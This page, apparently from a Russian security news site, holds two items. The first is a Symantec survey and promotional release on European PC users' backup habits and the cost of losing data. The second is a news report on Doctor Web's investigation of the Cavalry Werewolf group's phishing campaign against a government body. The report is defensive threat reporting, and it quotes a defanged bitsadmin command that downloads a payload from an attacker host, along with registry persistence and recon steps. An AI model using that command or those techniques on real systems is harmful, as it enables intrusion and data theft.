Сможет ли горячая клавиша CTRL+S сохранит вашу цифровую жизнь?

Сможет ли горячая клавиша CTRL+S сохранить вашу цифровую жизнь?

...

Число владельцев домашних ПК продолжает расти, и люди стали рассматривать свой компьютер как место, где в виде ценных цифровых свидетельств хранится «вся их жизнь». На это указывает исследование Symantec, производителя программного обеспечения Norton. Отчет опубликован как раз накануне начала поры летних каникул и отпусков, полной семейных фотографий. 


Изучив манеры хранения данных 3000 человек в Великобритании, Франции и Германии, исследователи подтвердили наличие сильной эмоциональной связи с огромным числом хранящихся в ПК субъективно значимых данных. 


Исчезновение данных оказывает двойное воздействие: эмоциональный удар и финансовые потери, связанные с восстановлением самых разнообразных файлов, которые мы храним в своих ПК сегодня. В ответ на просьбу оценить совокупную стоимость (программное обеспечение, оборудование и поддержка) восстановления всех файлов из ПК, европейцы в среднем указали сумму в €1772 на человека – это прожиточный минимум по Москве за 9 месяцев. (Из расчета 8377 рублей для трудоспособного населения города в месяц)
Исследование показало также, что резервное копирование большинства этих драгоценных реликвий и жизненно важных документов осуществляется с применением небезопасных методов. 


«Тот факт, что 77% из 3000 опрошенных европейцев выполняет резервное копирование по крайней мере некоторых своих файлов, обнадеживает, однако согласно опросу, наиболее популярные методы резервного копирования – на внешнее устройство или диск – с большой вероятностью могут не сработать. 60% из тех, кто терял файлы, называют в качестве причины отказ оборудования. Всего 11% копируют ценные файлы в защищенное онлайновое хранилище, где они застрахованы от обычных причин, приводящих к потере данных», - говорит Кирилл Керценбаум, руководитель группы технических специалистов Symantec в России и СНГ.

Фотопамять


Исследование показало, что наибольшее эмоциональное воздействие оказывает потеря фотографий, персональной информации, финансовых данных и рабочих или учебных документов. Список потенциальных ударов по нервам возглавляет потеря фотографий: каждый восьмой (80%) согласен, что он расстроился бы, потеряв эту бесценную память. Но фотоархив — первый кандидат на потерю: почти половина (48%) из тех, кто терял данные (44% респондентов) лишились своих фотографий.


Цитаты


«В последние годы наше отношение к компьютеру изменилось. Теперь мы используем его для хранения бесценных, уникальных файлов, имеющих огромное эмоциональное значение. Разве ПК не заменил фотоальбомы или пачки любовных писем, перевязанных ленточкой? Вот почему меня поражает беспечность людей: всего 22% опрошенных выполняет резервное копирование всех своих файлов. 


А если учесть, что в качестве причины отказа от резервного копирования чаще всего называют то, что файлы кажутся недостаточно ценными, чтобы о них беспокоиться, возникает мысль, что люди просто не понимают, насколько важно регулярное резервное копирование. Цифровые фотографии бесценны, потому что они незаменимы, и наше исследование доказывает, каким ударом становится для людей исчезновение этой персональной информации из их ПК»,- говорит Михаил Мещанкин, руководитель направления розничных продаж, Symantec в России и СНГ.

Что для вас ценно?


Вот некоторые интересные региональные различия в типах данных, которые люди считают ценными:


• Французы ставят на первое место рабочие или учебные документы, оценивая их в €223
• Британцы больше всего ценят загруженные ТВ-передачи, восстановление которых обошлось бы им в €176
• Немцы выше всего ценят свою персональную финансовую информацию, оценивая стоимость восстановления этих данных в €208. 


Средняя стоимость восстановления материалов любой из 17 разных категорий данных — от коллекции звукозаписей до резюме, видеофильмов и адресных книг — составила €104, но в случае отказа оборудования компьютера или его заражения вирусом могут быть потеряны все эти данные. 


Облако с проблеском надежды


Резервное копирование на диск или другой сменный носитель с последующим восстановлением в случае отказа оборудования компьютера или его заражения вирусом — непростое дело, которое отнимает много времени и нервов. Действительно, 43% опрошенных столкнулись с трудностями при восстановлении своих файлов, а две трети (66%) из тех, кто потерял файлы, так и не смогли их восстановить. 


Новейшее решение для резервного копирования, Norton Online Backup, упрощает людям во всем мире резервное копирование цифровых фотографий, важных финансовых документов, коллекций звукозаписей и архивов электронной почты, позволяя делать это через единый, простой в применении веб-сайт. 


На нем можно безопасно хранить резервные копии из пяти домашних компьютеров, управляя ими и восстанавливая их через единственную централизованную, дистанционно доступную учетную запись. В ПК загружается всего один компактный агент, который управляет процессом резервного копирования, а для восстановления или загрузки файлов, сохраненных ранее из любого места, достаточно веб-браузера. Безопасный и простой в применении веб-интерфейс упрощает управление резервным копированием, позволяя заказчикам управлять всеми своими сохраненными файлами, обращаться к ним и восстанавливать их через любой поддерживаемый интернет-браузер в любое время и в любом месте. 


Полезные ссылки


Советы по резервному копированию ценных цифровых файлов 


Создайте резервную копию прямо сейчас!


http://www.symantec.com/ru/ru/norton/clubsymantec/library/article.jsp?ai...
Демо-версия на 30 дней (на англ. языке)
http://nct.symantecstore.com/fulfill/0184.087

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

Группировка Cavalry Werewolf взломала сеть госоргана с помощью бэкдоров

В июле 2025 года к специалистам компании «Доктор Веб» обратился клиент из госсектора с жалобой на рассылку подозрительных писем с корпоративного почтового ящика. Расследование показало: перед ними была целевая кампания кибергруппировки, которую аналитики идентифицировали как Cavalry Werewolf.

Цель атаки — сбор конфиденциальной информации и картирование сети для дальнейшего закрепления внутри инфраструктуры.

Начали злоумышленники банально, но эффективно — с фишинга. В качестве «приманки» приходили архивы с паролем и вложенным бэкдором BackDoor.ShellNET.1 (основан на открытом проекте Reverse-Shell-CS). Файлы маскировались под служебные записки и другие официальные документы — имена были соответствующие, чтобы снизить бдительность получателя.

 

После запуска BackDoor.ShellNET.1 атакующие использовали стандартный для Windows инструмент bitsadmin для скачивания дополнительных полезных нагрузок (пример: bitsadmin /transfer www /download hxxp://…/winpot.exe). Среди загруженных модулей оказался стилер Trojan.FileSpyNET.5, который массово тянул документы (.doc/.docx/.xlsx/.pdf), текстовые файлы и изображения. Для скрытого доступа применяли BackDoor.Tunnel.41 (вариант ReverseSocks5) — с его помощью создавались SOCKS5-туннели и обеспечивалось скрытое подключение к заражённому ПК.

Дальше — больше: специалисты «Доктор Веб» обнаружили целый набор инструментов, как собственных, так и основанных на open-source. В арсенале группировки — скриптовые загрузчики (например, BAT.DownLoader.1138), «упакованные» трояны (Trojan.Packed2.49708, Trojan.Siggen31.54011 и т. п.), бэкдоры, управляемые через телеграм-ботов (BackDoor.Siggen2.5463, BackDoor.ShellNET.2), а также прокси-модули типа BackDoor.ReverseProxy.1. Некоторые варианты внедряли полезную нагрузку в легитимные процессы — например, инжектировали данные в aspnet_compiler.exe, чтобы бэкдор выполнялся в контексте доверенного приложения.

 

Интересно, что злоумышленники активно пользуются открытими решениями: либо берут код «как есть», либо модифицируют его под свои нужды. Для доставки следующей волны вредоносов они используют стандартные утилиты — PowerShell, bitsadmin, curl — а для сохранения присутствия в системе модифицируют автозагрузку через реестр (HKCU\...\Run) или ставят исполняемые файлы в C:\users\public\pictures и похожие публичные папки.

Атака Cavalry Werewolf показала типичную для целевых кампаний логику: разведка (whoami, ipconfig, просмотр директорий), проверка прокси и сети, затем загрузка инструментов и закрепление. Также злоумышленники могли позже использовать скомпрометированные устройства для перехода в другие сети — например, при смене работы жертвы — и разворачивать дальнейшие атаки через доверенные каналы.

Отдельные особенности группировки, которые отмечают аналитики «Доктор Веб»: предпочтение к open-source-инструментам, частое использование обратных шеллов и SOCKS-туннелей, внедрение вреда в видимо «безобидные» программы и управление через Telegram API. Фишинговые рассылки имитируют сообщения от государственных органов — это снижает подозрительность целевой аудитории и повышает шансы успешной компрометации.

Рекомендации для организаций — стандартный, но действенный набор мер: усилить фильтрацию почты и блокировку подозрительных вложений, ограничить возможность запуска bitsadmin/PowerShell неподписанных скриптов, включить контроль исполнения (application control) и EDR, регулярно проверять целевые публичные папки, применять многофакторную аутентификацию и оперативно реагировать на подозрительные соединения с неизвестными C2-адресами. При обнаружении инцидента — немедленно изолировать пострадавшие хосты и провести полноценную форензику, чтобы выявить степень компрометации.

Расследование «Доктор Веб» — ещё одно напоминание: даже крупные организации с государственным уровнем защиты уязвимы к грамотному фишингу и тому, что за ним следует. В современных целевых атаках именно сочетание человеческой ошибки и хорошо отлаженных инструментов злоумышленников делает наибольший ущерб.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru